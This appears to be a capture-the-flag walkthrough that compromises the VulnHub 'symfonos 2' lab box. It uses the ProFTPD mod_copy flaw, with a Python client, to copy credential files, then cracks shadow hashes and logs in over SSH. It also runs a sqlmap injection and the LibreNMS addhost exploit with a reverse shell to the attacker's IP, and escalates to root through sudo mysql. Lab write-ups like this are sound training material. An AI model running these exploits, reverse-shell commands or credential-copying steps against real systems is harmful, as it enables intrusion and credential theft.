【攻略鸭】symfonos 2: VulnHub Target Machine Walkthrough

The content of this article is purely fictional; please follow and like to show your support!
Set the target VM's network adapter to NAT.
Target IP: 192.168.31.244
Attacker (test machine) IP: 192.168.31.37
External information gathering
Visiting http://192.168.31.244/ shows nothing but an image.
Port scan
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http syn-ack ttl 64 WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m50s, median: 0s
| smb-security-mode:
| account_used: guest
137/udp open netbios-ns
161/udp open snmp
Web directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.244/FUZZ
No results.
SMB null-session login
Contents of smb://192.168.31.244/anonymous/backups/log.txt:
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# Set the user and group under which the server will run.
User aeolus
Group aeolus
<Anonymous ~ftp>
User ftp
Group ftp
(This is the point at which to run password guessing for aeolus and ftp against the SSH and FTP services.)
Three things in this log matter later: root created /var/backups/shadow.bak with a plain shell redirect, so unlike /etc/shadow the copy carries root's default umask and is readable by other local users; the anonymous SMB share is /home/aeolus/share, inside aeolus's home directory; and ProFTPD runs as aeolus, so whatever the FTP daemon reads or writes, it does with aeolus's permissions.
FTP service checks
Anonymous login on port 21 fails.
$ searchsploit ProFTPD
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
$ searchsploit -m 36742.txt
Failed: 36742.txt is a text advisory describing the manual SITE CPFR/CPTO steps rather than a script to run (it is revisited below).
$ searchsploit -m 49908.py
Exploit Completed
[!] Something Went Wrong
[!] Directory might not be writable
$ searchsploit -m 36803.py
$ python2 36803.py 192.168.31.244 /var/www/html id
[ - ] Error : 404 [ - ]
$ searchsploit -m 37262.rb
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure copying PHP payload to website path, directory not writable?
All of these fail for the same reason: each script, like the Metasploit module, copies a PHP payload into the web root (/var/www/html by default) and then requests it over HTTP, but the FTP daemon runs as aeolus and cannot write there. What is needed is a directory the daemon can write to and that we can read back from.
Exploiting the ProFTPd file-copy vulnerability
Recall the share exposed over the SMB null session: /home/aeolus/share.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /home/aeolus/share
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > exploit
[*] 192.168.31.244:80 - 192.168.31.244:21 - Sending copy commands to FTP server
[*] 192.168.31.244:80 - Executing PHP payload /8N231L.php
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure executing payload
Browsing smb://192.168.31.244/anonymous/ shows that /8N231L.php has in fact been written. The copy worked; only the trigger step failed, because the share is not served by the web server, so the PHP is never executed.
Go back to 36742.txt and drive the copy by hand, using the file-copy flaw to put the target's credential files into /home/aeolus/share. The failed login below does not matter: on this build SITE CPFR/CPTO are accepted before authentication.
$ ftp
ftp> o
(to) 192.168.31.244
Connected to 192.168.31.244.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.31.244]
Name (192.168.31.244:kali):
331 Password required for kali
Password:
530 Login incorrect.
ftp: Login failed
ftp> site cpfr /etc/passwd
ftp> site cpto /home/aeolus/share/passwd.copy
ftp> site cpfr /etc/shadow
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
550 cpto: Permission denied
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
250 Copy successful
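The same SITE CPFR/CPTO exchange as a small Python client, added here as an example that is not part of the original walkthrough. It sends no credentials and checks the reply codes the way the manual session above does (350 after CPFR, then 250 or 550 after CPTO). FakeProftpd is a constructed test double that replays the target's observed answers so the client logic runs offline; its path sets and the host-facing mod_copy_tcp wrapper are assumptions for illustration.

```python
"""ProFTPD 1.3.5 mod_copy (CVE-2015-3306) driven from Python instead of ftp(1).

Added example, not part of the original walkthrough. SITE CPFR/CPTO are
accepted before USER/PASS on a vulnerable build, so the client never logs in.
FakeProftpd is a constructed stand-in that replays the reply codes seen on the
page so the client logic can be exercised offline.
"""
import socket


class FtpControl:
    """Line-oriented wrapper over an FTP control connection; `conn` only needs
    recv()/sendall(), so a real socket or a test double both work."""

    def __init__(self, conn):
        self.conn = conn
        self.buf = b""

    def readline(self):
        while b"\n" not in self.buf:
            chunk = self.conn.recv(4096)
            if not chunk:
                raise ConnectionError("control connection closed by server")
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\n")
        return line.decode("utf-8", "replace").rstrip("\r")

    def reply(self):
        """Read one FTP reply (handles the RFC 959 multi-line form); return (code, text)."""
        line = self.readline()
        code = int(line[:3])
        if line[3:4] == "-":  # "220-..." continues until a "220 ..." line
            while not (line.startswith(str(code)) and line[3:4] == " "):
                line = self.readline()
        return code, line[4:]

    def cmd(self, command):
        self.conn.sendall((command + "\r\n").encode())
        return self.reply()


def mod_copy(conn, src, dst):
    """Copy src to dst on the server via SITE CPFR / SITE CPTO; return (ok, last_reply).

    No credentials are sent. The copy runs with the daemon's own uid (aeolus on
    this target), so src must be readable and dst's directory writable by it.
    """
    ctl = FtpControl(conn)
    code, text = ctl.reply()
    if code != 220:
        return False, f"{code} {text}"
    code, text = ctl.cmd(f"SITE CPFR {src}")
    if code != 350:  # 350 = source exists, ready for destination name
        return False, f"{code} {text}"
    code, text = ctl.cmd(f"SITE CPTO {dst}")
    return code == 250, f"{code} {text}"


def mod_copy_tcp(host, src, dst, port=21, timeout=10):
    """Same exchange against a live host (assumed reachable; not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return mod_copy(s, src, dst)


class FakeProftpd:
    """Constructed test double mirroring the target's observed behaviour:
    /etc/shadow exists but is unreadable to the daemon user, root's shadow.bak
    copy is readable, and only /home/aeolus/share is writable."""

    READABLE = {"/etc/passwd", "/var/backups/shadow.bak"}
    EXISTING = READABLE | {"/etc/shadow"}
    WRITABLE_DIR = "/home/aeolus/share/"

    def __init__(self):
        self.out = b"220 ProFTPD 1.3.5 Server (ProFTPD Default Installation)\r\n"
        self.pending_src = None
        self.copied = {}  # dst -> src: what an attacker would then fetch over SMB

    def _say(self, code, text):
        self.out += f"{code} {text}\r\n".encode()

    def sendall(self, data):
        verb, _, rest = data.decode().strip().partition(" ")
        sub, _, path = rest.partition(" ")
        if verb.upper() != "SITE":
            self._say(530, "Please login with USER and PASS")
        elif sub.upper() == "CPFR":
            if path in self.EXISTING:
                self.pending_src = path
                self._say(350, "File or directory exists, ready for destination name")
            else:
                self._say(550, f"{path}: No such file or directory")
        elif sub.upper() == "CPTO":
            src = self.pending_src
            if src is None:
                self._say(503, "Bad sequence of commands")
            elif src not in self.READABLE or not path.startswith(self.WRITABLE_DIR):
                self._say(550, "cpto: Permission denied")
            else:
                self.copied[path] = src
                self._say(250, "Copy successful")
        else:
            self._say(500, "SITE command not understood")

    def recv(self, n):
        chunk, self.out = self.out[:n], self.out[n:]
        return chunk


if __name__ == "__main__":
    # Offline replay of the two attempts from the walkthrough: denied, then successful.
    print(mod_copy(FakeProftpd(), "/etc/shadow", "/home/aeolus/share/shadow.copy"))
    print(mod_copy(FakeProftpd(), "/var/backups/shadow.bak", "/home/aeolus/share/shadow.copy"))
```

Against the live box the call would be mod_copy_tcp("192.168.31.244", "/var/backups/shadow.bak", "/home/aeolus/share/shadow.copy"), followed by fetching the result over the anonymous share exactly as done above; the 550 on /etc/shadow and the 250 on shadow.bak are the two outcomes the double reproduces.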
Fetch the exported files over the SMB null session:
smb://192.168.31.244/anonymous/passwd.copy
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:
smb://192.168.31.244/anonymous/shadow.copy
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
librenms:!:18095::::::
A quick lookup: LibreNMS is an open-source, SNMP-based network monitoring system, which fits the librenms account and the open 161/udp.
Crack the hashes with john:
$ unshadow passwd.copy shadow.copy > unshadowed.txt
Remove the entries for accounts without a usable hash.
$ john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
sergioteamo (aeolus)
$ ssh aeolus@192.168.31.244
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Privilege escalation
Kernel exploits
$ searchsploit Linux Kernel 4.9
No suitable kernel exploit found.
aeolus@symfonos2:/tmp$ gcc CVE-2019-13272.c -o exp
aeolus@symfonos2:/tmp$ ./exp
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[-] Could not find pkexec executable at /usr/bin/pkexec
The CVE-2019-13272 PoC needs a setuid helper such as pkexec on the box; this target has none, so it stops at the environment check.
sudo escalation as aeolus
$ sudo -V
Sudo version 1.8.19p1
aeolus@symfonos2:/tmp$ sudo -u#-1 /bin/bash
[sudo] password for aeolus:
aeolus is not in the sudoers file.
sudo 1.8.19p1 is affected by CVE-2019-14287 (the -u#-1 bypass), but that bug only helps a user who already has a sudoers rule restricted to non-root targets; aeolus has no rule at all, so this is a dead end.
Listening ports
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 50 *:139 *:*
tcp LISTEN 0 128 127.0.0.1:8080 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 20 127.0.0.1:25 *:*
tcp LISTEN 0 50 *:445 *:*
tcp LISTEN 0 50 :::139 :::*
tcp LISTEN 0 64 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 20 ::1:25 :::*
tcp LISTEN 0 50 :::445 :::*
Port 8080 (and likewise 3306 and 25) is bound to 127.0.0.1 only, so it is reachable only from the box itself.
SSH local port forwarding
┌──(kali)-[~/pentest]
└─$ ssh -N -f -L 8999:127.0.0.1:8080 aeolus@192.168.31.244
aeolus@192.168.31.244's password:
┌──(kali)-[~/pentest]
└─$ firefox http://127.0.0.1:8999
The forwarded site redirects to http://127.0.0.1:8999/login, a LibreNMS login page.
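Added example (not from the walkthrough): a short Python triage of the ss listing above that picks out the services bound only to loopback and emits the matching ssh -L forwards. SS_OUTPUT is the page's listing pasted in as constructed sample input; the local-port numbering starting at 8999 mirrors the forward used above.

```python
"""Triage of `ss` listening-socket output: which TCP services listen only on
loopback, and the ssh -L commands to reach them. Added example, not part of the
walkthrough; SS_OUTPUT is the page's listing pasted in as sample input."""
from dataclasses import dataclass

SS_OUTPUT = """\
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 50 *:139 *:*
tcp LISTEN 0 128 127.0.0.1:8080 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 20 127.0.0.1:25 *:*
tcp LISTEN 0 50 *:445 *:*
tcp LISTEN 0 50 :::139 :::*
tcp LISTEN 0 64 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 20 ::1:25 :::*
tcp LISTEN 0 50 :::445 :::*
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int

    def loopback(self):
        """True for 127.0.0.0/8 and ::1; "*" and "::" mean every interface."""
        return self.addr == "::1" or self.addr.startswith("127.")


def parse_ss(text):
    """Parse lines of the form `proto STATE recvq sendq local peer`; other lines are skipped."""
    found = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or f[1] != "LISTEN":
            continue
        addr, _, port = f[4].rpartition(":")  # rpartition copes with IPv6 such as "::1:25"
        found.append(Listener(f[0], addr, int(port)))
    return found


def loopback_only_ports(listeners):
    """Ports whose every listening socket is on loopback: invisible from the network."""
    exposed = {l.port for l in listeners if not l.loopback()}
    return sorted({l.port for l in listeners if l.loopback()} - exposed)


def ssh_forward_commands(ports, user, host, first_local_port=8999):
    """One `ssh -N -f -L` per hidden port, local ports assigned sequentially."""
    return [f"ssh -N -f -L {first_local_port + i}:127.0.0.1:{p} {user}@{host}"
            for i, p in enumerate(ports)]


if __name__ == "__main__":
    hidden = loopback_only_ports(parse_ss(SS_OUTPUT))
    print("loopback-only ports:", hidden)
    for cmd in ssh_forward_commands(hidden, "aeolus", "192.168.31.244"):
        print(cmd)
```

On this listing the result is 25, 3306 and 8080; 8080 is the one that turns out to carry the LibreNMS interface, and 3306 would be the local MySQL if credentials for it surfaced later.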
$ searchsploit -m 48453.txt
48453.txt is the LibreNMS 1.46 'search' SQL injection advisory; it requires an authenticated LibreNMS user.
http://127.0.0.1:8999/ajax_search.php?search=%27&type=group
The search parameter is injectable. With the cookies of a logged-in session, sqlmap confirms it (the 1* marks the injection point):
sqlmap -u "127.0.0.1:8999/ajax_search.php?search=1*&type=group" --cookie="PHPSESSID=tbvducu8v4cvcrko7cllj1ika6; XSRF-TOKEN=eyJpdiI6Im1UcnZ3ZE11a2VpOU8ycnhNdFFYb3c9PSIsInZhbHVlIjoieldlMGZuSzJvenlrZkZoZTJaVTQ5cCtiU1FoZGhRbVpxSDNBN0NYSDc3VEcrMjQzVlJBUzJpN3RrSUlLVTQ5OStxMlhzZm8zQytpRjV4dktGbjhWRHc9PSIsIm1hYyI6IjA0MjBiOTJlNGEwNzgxYTVlYTcwMWE2ZjQzOTM4NWJmZjBmZTI5MWYxZmIyNjMwN2YzMzAzODlkNzg1YzEzOWIifQ%3D%3D; librenms_session=eyJpdiI6InYxXC9uK0owOGs1SCtIdTBWN0xncU5BPT0iLCJ2YWx1ZSI6IitoWUhSQjBcL25pQytXbmNzcEI1NmNKWHRLd1k1OFh5ME8zOXZpTXhOTkRWY0lLVElEaWpZQlVrQmtqdCtMeUZNXC94c1JoZVcycThGa1VTVzRPYWF3WlE9PSIsIm1hYyI6IjUwYzAxYmJkOTE4NzMwYWUyNzdlZmJjYjdlMDRjNDNmNThkMGI0N2MyOWM1MTM0NTdkZDY0ZGJiMDNkNWMwZTYifQ%3D%3D" --batch --dbs
available databases [2]:
[*] information_schema
[*] librenms
$ searchsploit -m 47044.py
CVE-2018-20434: LibreNMS 1.46 'addhost' remote code execution.
The bug is in capture.inc.php (LibreNMS 1.46 and earlier): the SNMP community string of a device added through /addhost is later passed into a shell command without sanitisation, so shell metacharacters in it are executed. An authenticated LibreNMS user is required.
Logging in to http://127.0.0.1:8999 with aeolus:sergioteamo (the SSH password is reused for the LibreNMS account) redirects to http://127.0.0.1:8999/addhost; take the session cookies from there.
$ nc -nvlp 5433
$ python2 47044.py http://127.0.0.1:8999 "PHPSESSID=3t1mq50uvdkdt0qg04atr1pl02; XSRF-TOKEN=eyJpdiI6ImNcL0lPcXhKOFwvWFdzbnBNZG9xSFREQT09IiwidmFsdWUiOiJDc01rXC9uRHhDcnF3SSsrV0hpQURqQzR3RjkwVVgyTDlpZlE5bWNuNzhGK1NqOWpvaWdzK2R1MHB0WEZIYVRaTGVwNWgwakNrWHF4ZlwvSHprRCtWQVBBPT0iLCJtYWMiOiJlOTAwNTA1OGUzMTBkM2RiMDZkZWRjNjUxOWQ5NzBhNmFkN2QxNzRkMTc1ZWZkOTEzMWExZTdhNDcwNWY2MTMyIn0%3D; librenms_session=eyJpdiI6IlNxYyt0eEFXVDcrUTRcLzZjdlgxU3Z3PT0iLCJ2YWx1ZSI6InNlZFwvUkhicHN6d1dWMEVGK0JMbThZcTFWSnZOQjBmUVhMRWxoTUE2Sk83K1NaN09tTktYamFHNGlVcGJwWElVcEdxVUdHeVdUSVlmWUxCbEVzK2xqZz09IiwibWFjIjoiZmRhYTBmZTc0YzY2ODFkMWYxYjAzNDQyOGY3Yjk5NGJmM2JkMjNhZjZiYWQyOTY1OGExODc3ODVkZDA3ZjRiZSJ9" 192.168.31.37 5433
[+] Device Created Sucssfully
The reverse shell comes back as cronus, the account LibreNMS runs under (note the supplementary librenms group):
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
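To make the root cause concrete, here is an added Python model of the bug class behind capture.inc.php (not LibreNMS code, which is PHP): an untrusted SNMP community string interpolated into a shell command line, beside the argv-list form that fixes it. echo stands in for the snmp binary, and the payload is a constructed community string; in PHP the equivalent fix is escapeshellarg() on the value or avoiding the shell altogether. The shell-string variant runs whatever the injected community contains, which is why the exploit's reverse shell comes back with the privileges of the process running the command (cronus here).

```python
"""Model of the LibreNMS addhost -> capture.inc.php command injection
(CVE-2018-20434). Added example, not LibreNMS code: `echo` stands in for the
snmp binary, and the two run_* functions contrast shell-string construction
(the vulnerable pattern) with an argv list (the fix)."""
import subprocess

SNMP_BIN = "echo"  # stand-in for snmpget/snmpbulkwalk so this runs anywhere
# Constructed payload: closes the snmp command, runs a second one, comments out the rest.
EVIL_COMMUNITY = "public; echo INJECTED #"


def build_shell_cmdline(host, community):
    """Vulnerable pattern: the untrusted community string is interpolated into a shell line."""
    return f"{SNMP_BIN} -v2c -c {community} {host} sysDescr.0"


def run_vulnerable(host, community):
    """Runs the line through /bin/sh, so metacharacters in `community` are interpreted."""
    out = subprocess.run(build_shell_cmdline(host, community), shell=True,
                         capture_output=True, text=True)
    return out.stdout


def run_hardened(host, community):
    """argv form: the community string is a single literal argument, never parsed by a shell."""
    out = subprocess.run([SNMP_BIN, "-v2c", "-c", community, host, "sysDescr.0"],
                         capture_output=True, text=True)
    return out.stdout


def injected(output, marker="INJECTED"):
    """True if the marker appears as a whole output line, i.e. a second command really ran."""
    return marker in output.splitlines()


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable("127.0.0.1", EVIL_COMMUNITY)))
    print("hardened:  ", repr(run_hardened("127.0.0.1", EVIL_COMMUNITY)))
```

With the shell form the output has a separate INJECTED line, proof that the second command executed; with the argv form the whole payload is echoed back as one inert argument.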
sudo escalation as cronus
$ sudo -l
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
$ sudo mysql -e '\! /bin/sh'
id
uid=0(root) gid=0(root) groups=0(root)
\! is the mysql client's shell-escape command; because sudo runs the client as root, the shell it spawns is root as well.
Other
flag
cat /root/proof.txt
Congrats on rooting symfonos:2!